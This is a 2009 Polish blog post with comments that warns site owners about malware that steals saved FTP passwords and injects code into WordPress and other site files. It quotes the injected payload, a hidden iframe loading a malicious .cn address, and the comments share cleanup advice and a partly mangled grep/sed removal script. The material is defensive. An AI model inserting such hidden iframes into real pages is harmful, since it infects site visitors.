Pozycjonowanie shpyo o pozycjonowaniu, black seo, optymalizacji, spamie ver. wyjście z mroku

Jesteś tutaj: Pozycjonwanie blog » Bezpieczeństwo stron WWW ★★★★★ » Uwaga na Wordpressy!

Uwaga na Wordpressy!

Od jakiegoś czasu po sieci grasuje wirus, który łączy się z naszymi serwerami (prawdopodobnie dane do FTP pobiera z Total Commandera) i dołacza kod html i php do naszych stron. Zagrożone są wszystkie skrypty. Te autorskie i darmowe tj. Wordpress.

Od jakiegoś czasu po sieci grasuje wirus, który łączy się z naszymi serwerami (prawdopodobnie dane do FTP pobiera z Total Commandera) i dołacza kod html i php do naszych stron. Zagrożone są wszystkie skrypty. Te autorskie i darmowe tj. Wordpress.

Gdzie?

Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php

Co?

Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):

<iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>

Co się dzieje?

Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”.

Sprawdź swoje strony, skasuj kody html i zmień hasło do FTP!

Komentarze

Gavatar Jurgi
09.04.2009 13:12:14, Jurgi napisał/-a:

O podkradaniu haseł do ftp z Totla Commandera już słyszałem.
Jedno pytanie: czy adres w tym kodzie jest stały? Można by go dodać do filtra. I: jak bardzo jest to zaraźliwe, infekuje tylko IE, czy coś jeszcze?

Gavatar Krzysztof Lis
09.04.2009 13:24:38, Krzysztof Lis napisał/-a:

Miałem coś takiego u klienta. Hasło wypłynęło raczej przez jego komputer (u siebie mam i firewalla i antywira) a wirusa znajdowałem ja po wejściu na stronę.

Gavatar Kapsel
09.04.2009 13:38:42, Kapsel napisał/-a:

@Jurgi - niestety, wygląda na to że problemem nie jest pojedynczy wirus, a mamy do czynienia po prostu z nowym rodzajem ataków.
Na witrynach klientków widziałem już najróżniejsze wersje - od ramek, przez wklejenie żywych linków, aż po pseudoszyfrowane JavaScripty.
Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy do FTP - być może nowa wersja już bangla. Ale zagrożony tak naprawdę jest każdy program do FTP nie szyfrujący plików z hasłami.

Przy okazji - co robić po ataku - otóż nie wystarczy usunąć kod i przeskanować komputer w poszukiwaniu robala - trzeba też zmienić hasło do FTP! Miałem już przypadek, że kod został usunięty, komputer wyczyszczony, a bot po pewnym czasie wrócił i używając tego samego hasła wrzucił ponownie śmieci na stronę.

Gavatar Paweł Rabinek
09.04.2009 14:05:48, Paweł Rabinek napisał/-a:

Potwierdzam to co pisze @Kapsel, po usunięciu wirusa, trzeba jeszcze zmienić hasło do FTP. Miałem podobnego wirusa, tylko, że mi wklejał kod JS.

Gavatar jrasti
09.04.2009 15:12:44, jrasti napisał/-a:

#!/bin/sh

FINDLINE=$(grep -r "cutlot.cn" * |cut -f1 -d: |grep -v $0)

for i in $FINDLINE;do
sed -i "s###" $i
done



Tu skrypt wyszukujacy dodane linijki. Podziekowania dla spolecznosci forum Ubuntu.pl za pomoc.

Gavatar jrasti
09.04.2009 15:13:50, jrasti napisał/-a:

[klik]?t=98263

tutaj jest poprawny skrypt.

aby wyszukac pliki zainfekowane:

find -type f -exec grep -q 'cutlot' {} ; -print

Gavatar Marek
09.04.2009 16:45:46, Marek napisał/-a:

Polecam FlashFXP z szyfrowaniem zapamiętanych haseł.

Gavatar Marcin
09.04.2009 19:23:24, Marcin napisał/-a:

Również ja miałem problemy z podobnym wirusem. Kod doklejał się do każdego index.php, bez względu na zastosowany CMS. Bardzo nieprzyjemne, bo po skasowaniu w parę dni później znów było. Wyleczyłem to dzięki Trojan Removerowi i później zmianie wszystkich haseł.

Gavatar Robert
09.04.2009 20:46:27, Robert napisał/-a:

Wczoraj spotkało mnie to samo. Wirus dokleja swój kod do każdego pliku index.php i index.html. Nie ma znaczenia czy to skrypt czy stateczna strona www.
Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.

Gavatar Mac User
10.04.2009 10:44:03, Mac User napisał/-a:

Co to jest wirus? :D

Gavatar DJ SEBSON
10.04.2009 14:27:29, DJ SEBSON napisał/-a:

@Mac User: duża bakteria :D:D

Gavatar mirek
11.04.2009 09:05:19, mirek napisał/-a:

@DJ SEBSON: Raczej mała bakteria (a w zasadzie to nie bakteria tylko wirus) :D:D

Gavatar Ylv
15.04.2009 20:33:30, Ylv napisał/-a:

@Kapsel
>Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy

Zaraz zaraz, chcesz powiedzieć, że TC do tej pory przechowuje hasła jako plaintext? Hm, dobrze, że po krótkim kontakcie z tym programem zrezygnowałem z niego. ;)

Gavatar MARIAN
16.04.2009 18:09:35, MARIAN napisał/-a:

a ja tego wirusa podam do sądu!

Gavatar Adam
17.04.2009 18:01:07, Adam napisał/-a:

Słyszałem o tym "chadziajestwie wrednym" wiele osób złapało. Przejrzałem część swoich stron i nie ma na szczęście ramek. Zmieniłem nawet TC na Filezilla, chociaż to nie jest pewne, że wykrada hasła z TC.

Gavatar Bogdan
17.04.2009 21:03:00, Bogdan napisał/-a:

Z FileZilli też wykrada...

Gavatar Adama
18.04.2009 11:58:09, Adama napisał/-a:

ale jednak TC jest najpopularniejszy, więc ryzyko chyba największe, zależy w jaki sposób wykrada hasała.

Gavatar Lesiu
20.04.2009 15:43:27, Lesiu napisał/-a:

Ja polecam FlashFXP, mimo iż nie jest darmowy. Na pewno bardziej przyjazny w użyciu niż FileZilla. Jeśli zaś chodzi o szablony do WP to polecam pobierać je z oficjalnych stron ich autorów, gdyż w serwisach będących zbiorami takich szablonów można wielokrotnie nadziać się na "modyfikowane" szablony z różnymi "niespodziankami".

Gavatar croll
23.04.2009 09:46:41, croll napisał/-a:

a co myslicie na laczenie sie poprzez WINSCP?
Zamiast TC oczywiscie.

Gavatar raj
23.04.2009 17:35:19, raj napisał/-a:

Jednego z moich userów to też dopadło. Co do SCP to oczywiście jest znacznie lepszy niż FTP (zwłaszcza przy autoryzacji kluczami), ale i tak podstawowa zasada bezpieczeństwa to nigdy nie przechowywać zapamiętanych haseł w żadnym programie! Hasło jest od tego, żeby znajdowało się tylko w głowie i żeby za każdym razem trzeba było je "z palca" wpisywać przy połączeniu. Inaczej użycie haseł traci w ogóle sens.

Gavatar Maciejcz
26.04.2009 22:50:43, Maciejcz napisał/-a:

Hej, wydaje mi się, że to nie jest Total Commander, prawdopodobnie wirus wykorzystuje katalog TMP - więcej pod tym adresem [klik]

Gavatar Nomad
18.05.2009 09:30:52, Nomad napisał/-a:

Pojawila sie chyba kolejna mutacja - zmiania index.php i dodaje juz pokodowane linki :)

Gavatar Nomad
18.05.2009 20:32:42, Nomad napisał/-a:

Potyczki na Wordpressem i pozostawionym hasłem
[klik]

Gavatar Marcin
18.05.2009 22:55:47, Marcin napisał/-a:

U mnie to samo sie stalo.. na winylowe.com. O dziwo - korzystam z Maca, Leopard. TYLKO i wyłącznie.

Gavatar Grzesiek
09.06.2009 17:22:28, Grzesiek napisał/-a:

Wirus wykrada cały plik z zapisanymi danymi do strony, zaszyfrowanie hasła pomoże jedynie w dodaniu go do robota doklejającego kod, ponieważ ręcznie da się wejść na FTP, jedyna szansa to zaszyfrować cały plik unikalnym kluczem który można otworzyć tylko na tym jednym komputerze.

Gavatar soczek
24.06.2009 18:23:19, soczek napisał/-a:

Zmieniłem hasło, zainstalowałem TCMD, wgrałem ponownie wszystkie pliki, wirus wraca... Ma ktoś jakiś pomysł?

Gavatar Kamil
30.06.2009 01:38:44, Kamil napisał/-a:

Wirus wykrada hasła także za pośrednictwem FlashFXP, co mnie bardzo dziwi. Niestety i mnie to spotkało, choć używam tylko tego jednego klienta FTP.

Gavatar Kaluza
10.08.2009 20:53:27, Kaluza napisał/-a:

Ja miałem 43 robaki na swojej stronie. I wszystkie zniszczyłem. Jak narazie żaden nie powrócił. Napisałem krótki poradnik jak się ich pozbyć - [klik]?p=5

Gavatar B.
11.08.2009 22:15:36, B. napisał/-a:

Problem jest tylko taki, o czym prawie nikt nie wspomina, ze np. Kaspersky absolutnie nie wykrywa tego wirusa i moze on sobie buszowac po kompie w dowolny sposob... o czym sie wlasnie bolesnie przekonalem.
Druga sprawa - niestety nie wystarczy samo wyciecie wrednego kodu ze strony (bo tam nie ma zadnego wirusa tylko kod - glownie generujacy ruch na stronach np xxx pewnie w celach reklamowych) - trzeba poprawic caly plik bo wirus wklejajac zlosliwy iframe niestety dokonuje ciec w kodzie strony (pewnie wynika to z bledu w wirusie bo jest to dzialanie calkiem bezsensowne z punktu widzenia dzialania kodu - uniemozliwia czesto dzialanie strony)

Gavatar Darius
26.08.2009 09:32:49, Darius napisał/-a:

Ja mam już najnowszego TC i na szczęście hasła są szyfrowane... zresztą i tak wolę korzystać z ftp przez Mozille bo jest 10 razy bezpieczniejsza bardziej komfortowa i ma praktycznie same zalety... ;)

Gavatar konigstiger
03.04.2010 09:59:03, konigstiger napisał/-a:

Nie wiem czemu ludzie tworzą te wirusy. To jest takie bezinteresowne szkodzenie innym z pogranicza megalomani. Siedzą potem tacy w swoich jamach i podniecają się czyj wirus więcej naszkodził . Żal

Gavatar Krzychu
11.09.2010 10:25:53, Krzychu napisał/-a:

Chyba jedyna rada to nie dodawać do Total Commandera zapamiętywania haseł, ale jak się ma około stu kont to wpisywanie ręcznie każdego hasła jest co najmniej katorgą i strasznie utrudnia pracę. Można jeszcze przeklejać hasła zapisane chronologicznie, gdzie indziej.

Gavatar Adek
19.09.2010 23:54:11, Adek napisał/-a:

Ja już raz się przejechałem na zapamiętanym haśle w TC i choć byłem chroniony przez niezłego antywirusa, nie pomogło. Dziś korzystam z FileZilli, nie zapamiętuje haseł i jest spokój.

Gavatar Krzychu
11.09.2010 10:25:53, Krzychu napisał/-a:

Chyba jedyna rada to nie dodawać do Total Commandera zapamiętywania haseł, ale jak się ma około stu kont to wpisywanie ręcznie każdego hasła jest co najmniej katorgą i strasznie utrudnia pracę. Można jeszcze przeklejać hasła zapisane chronologicznie, gdzie indziej.

Gavatar Adek
19.09.2010 23:54:11, Adek napisał/-a:

Ja już raz się przejechałem na zapamiętanym haśle w TC i choć byłem chroniony przez niezłego antywirusa, nie pomogło. Dziś korzystam z FileZilli, nie zapamiętuje haseł i jest spokój.

Gavatar projektowanie stron www
02.03.2011 15:14:50, projektowanie stron www napisał/-a:

Jak cos jest za darmo, to nigdy nie bedzie bezpieczne w100% i tyle...

Gavatar zabieg
17.05.2011 11:37:57, zabieg napisał/-a:

Sam mam kilka wordpressów i inny stron więc warto uważać na wirusy.

Gavatar Tworzenie stron
04.02.2012 11:24:52, Tworzenie stron napisał/-a:

U mnie wirus zainfekował stronę dopisując adres bigdeal777 .com

Gavatar paweo
02.03.2012 13:25:29, paweo napisał/-a:

Virusy to większe bakterie.

A czy ktoś skanował kompa w poszukiwaniu bakterii???

Dodaj komentarz

Nie spamuj w komentarzach, bo Twój wpis zostanie natychmiast usunięty.